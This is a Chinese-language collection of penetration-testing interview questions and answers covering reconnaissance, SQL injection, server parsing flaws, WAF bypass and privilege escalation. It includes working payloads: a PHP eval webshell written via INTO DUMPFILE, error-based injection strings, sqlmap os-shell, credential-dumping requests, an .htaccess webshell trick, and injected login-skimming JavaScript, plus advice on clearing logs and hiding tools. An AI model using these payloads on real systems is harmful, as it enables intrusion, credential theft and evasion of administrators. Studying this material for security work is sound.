一套實用的滲透測試崗位面試題

 注意：ctrl+A顯示答案

1.拿到一個待檢測的站，你以爲應該先作什麼？

收集信息
whois、網站源IP、旁站、C段網站、服務器系統版本、容器版本、程序版本、數據庫類型、二級域名、防火牆、維護者信息另說...

2.mysql的網站注入，5.0以上和5.0如下有什麼區別？
5.0如下沒有information_schema這個系統表，沒法列表名等，只能暴力跑表名。
5.0如下是多用戶單操做，5.0以上是多用戶多操作。

3.在滲透過程當中，收集目標站註冊人郵箱對咱們有什麼價值？
丟社工庫裏看看有沒有泄露密碼，而後嘗試用泄露的密碼進行登陸後臺。
用郵箱作關鍵詞進行丟進搜索引擎。
利用搜索到的關聯信息找出其餘郵進而獲得經常使用社交帳號。
社工找出社交帳號，裏面或許會找出管理員設置密碼的習慣 。
利用已有信息生成專用字典。
觀察管理員常逛哪些非大衆性網站，拿下它，你會獲得更多好東西。

4.判斷出網站的CMS對滲透有什麼意義？
查找網上已曝光的程序漏洞。
若是開源，還能下載相對應的源碼進行代碼審計。

5.一個成熟而且相對安全的CMS，滲透時掃目錄的意義？
敏感文件、二級目錄掃描
站長的誤操做好比：網站備份的壓縮文件、說明.txt、二級目錄可能存放着其餘站點

6.常見的網站服務器容器。
IIS、Apache、nginx、Lighttpd、Tomcat

7.mysql注入點，用工具對目標站直接寫入一句話，須要哪些條件？
root權限以及網站的絕對路徑。

8.目前已知哪些版本的容器有解析漏洞，具體舉例。
IIS 6.0
/xx.asp/xx.jpg "xx.asp"是文件夾名
IIS 7.0/7.5
默認Fast-CGI開啓，直接在url中圖片地址後面輸入/1.php，會把正常圖片當成php解析
Nginx
版本小於等於0.8.37，利用方法和IIS 7.0/7.5同樣，Fast-CGI關閉狀況下也可利用。
空字節代碼 xxx.jpg%00.php
Apache
上傳的文件命名爲：test.php.x1.x2.x3，Apache是從右往左判斷後綴
lighttpd
xx.jpg/xx.php，不全,請小夥伴們在評論處不吝補充，謝謝！

9.如何手工快速判斷目標站是windows仍是linux服務器？
linux大小寫敏感,windows大小寫不敏感。

10.爲什麼一個mysql數據庫的站，只有一個80端口開放？
更改了端口，沒有掃描出來。
站庫分離。
3306端口不對外開放

11.3389沒法鏈接的幾種狀況。
沒開放3389 端口
端口被修改
防禦攔截
處於內網(需進行端口轉發)

12.如何突破注入時字符被轉義？
寬字符注入
hex編碼繞過

13.在某後臺新聞編輯界面看到編輯器，應該先作什麼？
查看編輯器的名稱版本,而後搜索公開的漏洞。

14.拿到一個webshell發現網站根目錄下有.htaccess文件，咱們能作什麼？
能作的事情不少，用隱藏網馬來舉例子：
插入
<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php 
.jpg文件會被解析成.php文件。
具體其餘的事情，很差詳說，建議你們本身去搜索語句來玩玩。

15.注入漏洞只能查帳號密碼？
只要權限廣，拖庫脫到老。

16.安全狗會追蹤變量，從而發現出是一句話木馬嗎？
是根據特徵碼，因此很好繞過了，只要思路寬，繞狗繞到歡，但這應該不會是一成不變的。

17.access 掃出後綴爲asp的數據庫文件，訪問亂碼。如何實現到本地利用。
迅雷下載，直接改後綴爲.mdb。

18.提權時選擇可讀寫目錄，爲什麼儘可能不用帶空格的目錄？
由於exp執行多半須要空格界定參數

19.某服務器有站點A,B 爲什麼在A的後臺添加test用戶，訪問B的後臺。發現也添加上了test用戶？
同數據庫。

20.注入時能夠不使用and 或or 或xor，直接order by 開始注入嗎？
and/or/xor，前面的1=1、1=2步驟只是爲了判斷是否爲注入點，若是已經肯定是注入點那就能夠省那步驟去。

21:某個防注入系統，在注入時會提示：
系統檢測到你有非法注入的行爲。 已記錄您的ip xx.xx.xx.xx 時間:2016:01-23 提交頁面:test.asp?id=15 提交內容:and 1=1
如何利用這個防注入系統拿shell？
在URL裏面直接提交一句話，這樣網站就把你的一句話也記錄進數據庫文件了 這個時候能夠嘗試尋找網站的配置文件 直接上菜刀連接。具體文章參見：一句話木馬在防注入中的重生-= 奇聞錄-笑 =。

22.上傳大馬後訪問亂碼時，有哪些解決辦法？
瀏覽器中改編碼。

23.審查上傳點的元素有什麼意義？
有些站點的上傳文件類型的限制是在前端實現的，這時只要增長上傳類型就能突破限制了。

24.目標站禁止註冊用戶，找回密碼處隨便輸入用戶名提示：「此用戶不存在」，你以爲這裏怎樣利用？
先爆破用戶名，再利用被爆破出來的用戶名爆破密碼。
其實有些站點，在登錄處也會這樣提示
全部和數據庫有交互的地方都有可能有注入。

25.目標站發現某txt的下載地址爲Client Validation，你有什麼思路？
這就是傳說中的下載漏洞！在file=後面嘗試輸入index.php下載他的首頁文件，而後在首頁文件裏繼續查找其餘網站的配置文件，能夠找出網站的數據庫密碼和數據庫的地址。

26.甲給你一個目標站，而且告訴你根目錄下存在/abc/目錄，而且此目錄下存在編輯器和admin目錄。請問你的想法是？
直接在網站二級目錄/abc/下掃描敏感文件及目錄。

27.在有shell的狀況下，如何使用xss實現對目標站的長久控制？
後臺登陸處加一段記錄登陸帳號密碼的js，而且判斷是否登陸成功，若是登陸成功，就把帳號密碼記錄到一個生僻的路徑的文件中或者直接發到本身的網站文件中。(此方法適合有價值而且須要深刻控制權限的網絡)。
在登陸後才能夠訪問的文件中插入XSS腳本。

28.後臺修改管理員密碼處，原密碼顯示爲*。你以爲該怎樣實現讀出這個用戶的密碼？
審查元素 把密碼處的password屬性改爲text就明文顯示了

29.目標站無防禦，上傳圖片能夠正常訪問，上傳腳本格式訪問則403.什麼緣由？
緣由不少，有可能web服務器配置把上傳目錄寫死了不執行相應腳本，嘗試改後綴名繞過

30.審查元素得知網站所使用的防禦軟件，你以爲怎樣作到的？
在敏感操做被攔截，經過界面信息沒法具體判斷是什麼防禦的時候，F12看HTML體部 好比護衛神就能夠在名稱那看到內容。

31.在win2003服務器中創建一個 .zhongzi文件夾用意何爲？
隱藏文件夾，爲了避免讓管理員發現你傳上去的工具。

32、sql注入有如下兩個測試選項，選一個而且闡述不選另外一個的理由：

A. demo.jsp?id=2+1 

B. demo.jsp?id=2-1
選B，在 URL 編碼中 + 表明空格，可能會形成混淆
33、如下連接存在 sql 注入漏洞，對於這個變形注入，你有什麼思路？

demo.do?DATA=AjAxNg==
DATA有可能通過了 base64 編碼再傳入服務器，因此咱們也要對參數進行 base64 編碼才能正確完成測試
34、發現 demo.jsp?uid=110 注入點，你有哪幾種思路獲取 webshell，哪一種是優選？

有寫入權限的，構造聯合查詢語句使用using INTO OUTFILE，能夠將查詢的輸出重定向到系統的文件中，這樣去寫入 WebShell
使用 sqlmap –os-shell 原理和上面一種相同，來直接得到一個 Shell，這樣效率更高
經過構造聯合查詢語句獲得網站管理員的帳戶和密碼，而後掃後臺登陸後臺，再在後臺經過改包上傳等方法上傳 Shell
35、CSRF 和 XSS 和 XXE 有什麼區別，以及修復方式？

XSS是跨站腳本攻擊，用戶提交的數據中能夠構造代碼來執行，從而實現竊取用戶信息等攻擊。修復方式：對字符實體進行轉義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時校驗、瀏覽器與Web應用端採用相同的字符編碼。

CSRF是跨站請求僞造攻擊，XSS是實現CSRF的諸多手段中的一種，是因爲沒有在關鍵操做執行時進行是否由用戶自願發起的確認。修復方式：篩選出須要防範CSRF的頁面而後嵌入Token、再次輸入密碼、檢驗Referer
XXE是XML外部實體注入攻擊，XML中能夠經過調用實體來請求本地或者遠程內容，和遠程文件保護相似，會引起相關安全問題，例如敏感文件讀取。修復方式：XML解析庫在調用時嚴格禁止對外部實體的解析。
36、CSRF、SSRF和重放攻擊有什麼區別？

CSRF是跨站請求僞造攻擊，由客戶端發起
SSRF是服務器端請求僞造，由服務器發起
重放攻擊是將截獲的數據包進行重放，達到身份認證等目的
37、說出至少三種業務邏輯漏洞，以及修復方式？

密碼找回漏洞中存在密碼容許暴力破解、存在通用型找回憑證、能夠跳過驗證步驟、找回憑證能夠攔包獲取等方式來經過廠商提供的密碼找回功能來獲得密碼
身份認證漏洞中最多見的是會話固定攻擊和 Cookie 仿冒，只要獲得 Session 或 Cookie 便可僞造用戶身份
驗證碼漏洞中存在驗證碼容許暴力破解、驗證碼能夠經過 Javascript 或者改包的方法來進行繞過
38、圈出下面會話中可能存在問題的項，並標註可能會存在的問題？
get /ecskins/demo.jsp?uid=2016031900&keyword=」hello world」 HTTP/1.1

Host:.com:82

User-Agent:Mozilla/5.0 Firefox/40Accept:text/css,/;q=0.1

Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3

Referer:http://.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902

Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;

uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;st_uid=N90PLYHLZGJXI-NX01VPUF46W;status=TrueConnection:keep-alive
11

39、找一類你最擅長的漏洞，談下繞過漏洞修復後的方案？
40、你經常使用的滲透工具備哪些，最經常使用的是哪一個？
41、描述一個你深刻研究過的 CVE 或 POC。

第二套面試題：

給你一個網站你是如何來滲透測試的?
在獲取書面受權的前提下。
1)信息收集，
1，獲取域名的whois信息,獲取註冊者郵箱姓名電話等。
2，查詢服務器旁站以及子域名站點，由於主站通常比較難，因此先看看旁站有沒有通用性的cms或者其餘漏洞。
3，查看服務器操做系統版本，web中間件，看看是否存在已知的漏洞，好比IIS，APACHE,NGINX的解析漏洞
4，查看IP，進行IP地址端口掃描，對響應的端口進行漏洞探測，好比 rsync,心臟出血，mysql,ftp,ssh弱口令等。
5，掃描網站目錄結構，看看是否能夠遍歷目錄，或者敏感文件泄漏，好比php探針
6，google hack 進一步探測網站的信息，後臺，敏感文件
2）漏洞掃描
開始檢測漏洞，如XSS,XSRF,sql注入，代碼執行，命令執行，越權訪問，目錄讀取，任意文件讀取，下載，文件包含，
遠程命令執行，弱口令，上傳，編輯器漏洞，暴力破解等
3）漏洞利用
利用以上的方式拿到webshell，或者其餘權限
4）權限提高
提權服務器，好比windows下mysql的udf提權，serv-u提權，windows低版本的漏洞，如iis6,pr,巴西烤肉，
linux藏牛漏洞，linux內核版本漏洞提權，linux下的mysql system提權以及oracle低權限提權
5) 日誌清理
6）總結報告及修復方案
sqlmap，怎麼對一個注入點注入？
1）若是是get型號，直接，sqlmap -u "諸如點網址".
2) 若是是post型諸如點，能夠sqlmap -u "注入點網址」 --data="post的參數"
3）若是是cookie，X-Forwarded-For等，能夠訪問的時候，用burpsuite抓包，注入處用號替換，放到文件裏，而後sqlmap -r "文件地址"
nmap，掃描的幾種方式
sql注入的幾種類型？
1）報錯注入
2）bool型注入
3）延時注入
4）寬字節注入
報錯注入的函數有哪些？
1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------
2）經過floor報錯 向下取整
3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4）.geometrycollection()select from test where id=1 and geometrycollection((select from(select from(select user())a)b));
5）.multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
6）.polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
7）.multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
8）.linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
9）.multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
10）.exp()select from test where id=1 and exp(~(select * from(select user())a));
延時注入如何來判斷？
if(ascii(substr(「hello」, 1, 1))=104, sleep(5), 1)
盲注和延時注入的共同點？
都是一個字符一個字符的判斷
如何拿一個網站的webshell？
上傳，後臺編輯模板，sql注入寫文件，命令執行，代碼執行，
一些已經爆出的cms漏洞，好比dedecms後臺能夠直接創建腳本文件，wordpress上傳插件包含腳本文件zip壓縮包等
sql注入寫文件都有哪些函數？
select '一句話' into outfile '路徑'
select '一句話' into dumpfile '路徑'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
如何防止CSRF?
1,驗證referer
2，驗證token
owasp 漏洞都有哪些？
1、SQL注入防禦方法：
2、失效的身份認證和會話管理
3、跨站腳本攻擊XSS
4、直接引用不安全的對象
5、安全配置錯誤
6、敏感信息泄露
7、缺乏功能級的訪問控制
8、跨站請求僞造CSRF
9、使用含有已知漏洞的組件
10、未驗證的重定向和轉發
SQL注入防禦方法？
1、使用安全的API
2、對輸入的特殊字符進行Escape轉義處理
3、使用白名單來規範化輸入驗證方法
4、對客戶端輸入進行控制，不容許輸入SQL注入相關的特殊字符
5、服務器端在提交數據庫進行SQL查詢以前，對特殊字符進行過濾、轉義、替換、刪除。
代碼執行，文件讀取，命令執行的函數都有哪些？
1，代碼執行：eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
2，文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
3，命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()
img標籤除了onerror屬性外，還有其餘獲取管理員路徑的辦法嗎？
src指定一個遠程的腳本文件，獲取referer
img標籤除了onerror屬性外，而且src屬性的後綴名，必須以.jpg結尾，怎麼獲取管理員路徑。

 

代碼審計
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

繞過walf

1、關鍵字能夠用%（只限IIS系列）。好比select，能夠sel%e%ct。原理：網絡層waf對SEL%E%CT進行url解碼後變成SEL%E%CT，匹配select失敗，而進入asp.dll對SEL%E%CT進行url解碼卻變成select。IIS下的asp.dll文件在對asp文件後參數串進行url解碼時，會直接過濾掉09-0d（09是tab鍵,0d是回車）、20（空格）、%(後兩個字符有一個不是十六進制)字符。xss也是同理。

2、通殺的，內聯註釋。安全狗不攔截，可是安全寶、加速樂、D盾等，看到/!/就Fack了，因此只限於安全狗。好比：/!select*/

3、編碼。這個方法對waf頗有效果，由於通常waf會解碼，可是咱們利用這個特色，進行兩次編碼，他解了第一次但不會解第二次，就bypass了。騰訊waf、百度waf等等均可以這樣bypass的。

4，繞過策略一：僞造搜索引擎

早些版本的安全狗是有這個漏洞的，就是把User-Agent修改成搜索引擎

5，360webscan腳本存在這個問題，就是判斷是否爲admin dede install等目錄，若是是則不作攔截

GET /pen/news.php?id=1 union select user,password from mysql.user

GET /pen/news.php/admin?id=1 union select user,password from mysql.user

2. GET /pen/admin/..\news.php?id=1 union select user,password from mysql.user

6，multipart請求繞過，在POST請求中添加一個上傳文件，繞過了絕大多數WAF。

7，參數繞過，複製參數，id=1&id=1

用一些特殊字符代替空格，好比在mysql中%0a是換行，能夠代替空格，這個方法也能夠部分繞過最新版本的安全狗，在sqlserver中能夠用/**/代替空格

8,內聯註釋，

文件上傳，複製文件包一份再加一份

在 form-data;後面增長必定的字符
寬字符注入

寬字符：解 決方法：就是在初始化鏈接和字符集以後，使用SET character_set_client=binary來設定客戶端的字符集是二進制的。修改Windows下的MySQL配置文件通常是 my.ini，Linux下的MySQL配置文件通常是my.cnf，好比：mysql_query("SETcharacter_set_client=binary");。character_set_client指定的是SQL語句的編碼，若是設置爲 binary，MySQL就以二進制來執行，這樣寬字節編碼問題就沒有用武之地了。